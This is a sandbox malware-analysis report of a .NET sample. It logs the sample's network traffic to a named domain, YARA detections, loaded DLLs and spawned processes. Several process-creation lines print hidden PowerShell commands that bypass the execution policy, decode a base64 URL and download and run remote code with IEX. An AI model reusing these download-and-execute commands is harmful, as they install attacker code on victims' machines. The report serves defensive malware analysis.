Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb/^ source: powershell.exe, 0000000C.00000002.1557064368.00000238D0452000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\ source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb: source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdbW source: powershell.exe, 0000000C.00000002.1558187413.00000238D0698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\app\assets\bin\temp-697cf367717e\obj\Release\CavnDkCvt.pdbbn|n nn_CorExeMainmscoree.dll source: 87J30ulb4q.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: global trafficHTTP traffic detected: GET /gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfpRHdvRHfwkDM1AzM HTTP/1.1Host: zjhy.coimbratratadores.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /jkqjcpxpnhtgxr HTTP/1.1Host: zjhy.coimbratratadores.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ukbhsxzcjwqypk HTTP/1.1Host: zjhy.coimbratratadores.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ukbhsxzcjwqypk HTTP/1.1Host: zjhy.coimbratratadores.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfpRHdvRHfwkDM1AzM HTTP/1.1Host: zjhy.coimbratratadores.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /jkqjcpxpnhtgxr HTTP/1.1Host: zjhy.coimbratratadores.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ukbhsxzcjwqypk HTTP/1.1Host: zjhy.coimbratratadores.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ukbhsxzcjwqypk HTTP/1.1Host: zjhy.coimbratratadores.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: zjhy.coimbratratadores.com
Source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000C.00000002.1476730296.00000238B6455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000008.00000002.1312185487.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B7544A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C840F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B752A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B83A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B754116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zjhy.coimbratratadores.com
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zjhy.coimbratratadores.comd
Source: powershell.exe, 00000009.00000002.1399731267.000001B752A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B83A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1308266474.0000000004A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
Source: powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1308266474.0000000004D9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B753BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B8FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1312185487.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C840F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B754110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9A5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B99CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zjhy.coimbratratadores.com
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRg
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zjhy.coimbratratadores.com/jkqjcpxpnhtgxr
Source: powershell.exe, 0000000C.00000002.1481177567.00000238B99CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zjhy.coimbratratadores.com/ukbhsxzcjwqypk
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49788 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7684, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\87J30ulb4q.exeCode function: 0_2_00A54C780_2_00A54C78
Source: C:\Users\user\Desktop\87J30ulb4q.exeCode function: 0_2_00A555480_2_00A55548
Source: C:\Users\user\Desktop\87J30ulb4q.exeCode function: 0_2_00A549300_2_00A54930
Source: C:\Users\user\Desktop\87J30ulb4q.exeCode function: 0_2_00A55D350_2_00A55D35
Source: 87J30ulb4q.exe, 00000000.00000002.1336329887.0000000000B3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 87J30ulb4q.exe
Source: 87J30ulb4q.exe, 00000000.00000000.1266829570.0000000000438000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCavnDkCvt.exe4 vs 87J30ulb4q.exe
Source: 87J30ulb4q.exeBinary or memory string: OriginalFilenameCavnDkCvt.exe4 vs 87J30ulb4q.exe
Source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7684, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.evad.winEXE@8/12@1/1
Source: C:\Users\user\Desktop\87J30ulb4q.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\87J30ulb4q.exe.logJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxwdlem1.d0c.ps1Jump to behavior
Source: 87J30ulb4q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 87J30ulb4q.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 87J30ulb4q.exeReversingLabs: Detection: 52%
Source: 87J30ulb4q.exeVirustotal: Detection: 63%
Source: unknownProcess created: C:\Users\user\Desktop\87J30ulb4q.exe "C:\Users\user\Desktop\87J30ulb4q.exe"
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"Jump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
